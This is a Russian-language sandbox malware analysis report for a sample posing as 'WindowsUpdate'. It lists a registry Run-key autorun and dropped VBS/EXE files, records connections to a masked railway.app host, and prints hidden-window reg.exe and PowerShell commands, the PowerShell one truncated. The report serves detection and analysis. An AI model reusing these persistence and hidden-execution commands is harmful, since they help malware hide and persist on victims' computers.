Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Run] 'WindowsUpdate' = '<SYSTEM32>\wscript.exe //B //Nologo "%APPDATA%\WindowsUpdate.vbs"'
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\windowsupdate.exe
- %APPDATA%\windowsupdate.vbs
- nul
Сетевая активность
Подключается к
- 'ro########ction-6f8f.up.railway.app':443
TCP
Другие
- '<DNS_SERVER>':53
- 'ro########ction-6f8f.up.railway.app':443
UDP
- DNS ASK ro########ction-6f8f.up.railway.app
Другое
Перезапускает анализируемый образец
Запускает на исполнение
- '<SYSTEM32>\reg.exe' ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d "<SYSTEM32>\wscript.exe //B //Nologo \"%APPDATA%\WindowsUpdate.vbs\"" /f (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /d /s /c "powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command "$p="%APPDATA%\Microsoft\Windows\AccountPictures"; $f=Get-ChildItem $p -Filter *.jpg -ErrorAction SilentlyContinue |... (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -NonInteractive -WindowStyle Hidden -Command "$p="%APPDATA%\Microsoft\Windows\AccountPictures"; $f=Get-ChildItem $p -Filter *.jpg -ErrorAction SilentlyContinue | Sort-Object Length -...
- '<Полный путь к файлу>' C:\snapshot\app\backend\.pkg-tmp-5738f1a6ebc36039\main.js --bg (со скрытым окном)
